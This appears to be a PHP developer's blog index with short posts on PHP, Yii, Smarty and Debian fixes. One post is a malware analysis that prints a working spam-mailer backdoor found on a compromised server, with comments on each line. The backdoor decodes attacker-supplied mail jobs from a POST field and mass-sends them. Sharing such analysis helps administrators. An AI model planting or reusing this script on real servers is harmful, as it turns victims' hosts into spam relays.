Differences between character counting in PHP and Javascript

I’ve recently codded my own validation rules for forms. I’m checking length of a string on a client side and also on a server side (obviously it’s a good practice). After my script went on a production, users started to complain about validation errors (even if data in a form was passed proper). This is really strange but…
Continue reading Differences between character counting in PHP and Javascript

PHP reading problem with files larger than 2 GB

If you’ll ever have problem with opening (fopen) and reading (fread) files larger than 2 GB in your PHP script. Check your version of scripting engine. In my case switching to 64 bit solved the problem. Please mind that this error is very hard to debug because PHP does not log anything (same as MS IIS) in such case. It simply resets client connection…

Permission denied when script is trying to execute ps_files_cleanup_dir

This is pretty common problem. I’ve encountered it on recent version of the Debian operating system. When you see something like that:

Notice:  session_start(): ps_files_cleanup_dir: opendir(/var/lib/php5/sessions) failed: Permission denied (13) in /mnt/www-data/htdocs/raportMNW/inc/bryanjhv/slim-session/src/Slim/Middleware/Session.php on line 110

You can fix that easily with following Linux commands:

sudo nano /etc/php5/apache2/php.ini

Now use CTRL+W to find following string session.save_path and configure it like that:

session.save_path = "/tmp"

Save your file using CTRL+X and restart Apache2 service:

sudo service apache2 restart

And voilà!

Force Yii to republish assets every page refresh

During webapp development you’ll need often assets republication. When you publish assets using directory path, framework won’t republish them automaticaly. So what can you do? It’s plain simple. Use YII_DEBUG constant as fourth argument in publish function.

$assetPath = Yii::app()->assetManager->publish(Yii::getPathOfAlias('application.modules.components.assets'), false, 1, YII_DEBUG);

From this moment Yii will republish assets on every page refresh only in debug mode (it won’t consume your resources in production mode).

PHP malicious code analysis no. 1

I found this piece of a PHP malware code on a compromised web server that I started to administer. It’s name was random character string eg. acbjxuu.php. There were about 20 more scripts of this kind. It’s rather very simple script for spaming purposes. For your understanding I’ve wrote what it’s doing in comments between code lines.

if (isset($_POST['task']))
{
	// be sure to display all PHP errors
	error_reporting(E_ALL);
	ini_set('display_errors', TRUE);
	// disable default PHP memory limit
	ini_set('memory_limit', '512M');
	// disable PHP execution time limit
	set_time_limit(0);
	ini_set('max_execution_time',0);
	ini_set('set_time_limit',0);
 
	// get serialized array from POST var named task
	// example array structure: array(array('to'=>'[email protected]', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)'));
	$x = unserialize(base64_decode($_POST['task']));
 
	// if task variable was wrongly serialized, just die silently...
	if ($x==false) {exit();}
 
 
	$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
 
	// now send half a million of viagra & cialis related mails... 
	foreach ($x as $arr)
	{
		echo $arr['to']."\r\n";
 
		$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
 
		mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
	}
	exit('SEND OK');
}

I’ll look in logs for IP addresses that tried to reach for this scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your webserver contents!

Smarty gettext with domain support (block t plugin) [depreciated]

Attention! Official Gettext plugin for Smarty has domain support since version 1.1. Check official repository: https://github.com/smarty-gettext/smarty-gettext.

Description:

This is a Smarty gettext plugin modification. It enables domain support and utilize gettext wrapper for PHP,

Why do I use such wrapper for a gettext? It’s simple, not every server has native support for translation. This crafty script gives you fallback in case if it does not.

Usage example:

Init before any template parsed by Smarty:

// include gettext wrapper for PHP
include('./php-gettext/gettext.inc');
 
// set locale
T_setlocale(LC_MESSAGES, 'en_US');
 
// load lang file
/* loads ./lang/en_US/LC_MESSAGES/example.mo (do not close path with final slash) */
T_bindtextdomain('example', './lang'); 
T_bind_textdomain_codeset('example', 'utf-8'); /* just in case */ 
 
// set default domain 
T_textdomain('default');

Smarty syntax example:

{t domain="example"}This text will be translated using gettext domain example.{/t}
{t}This text will be translated using standard gettext domain.{/t}

Installation:

Simply put file block.t.php into Smarty plugins directory.

Download: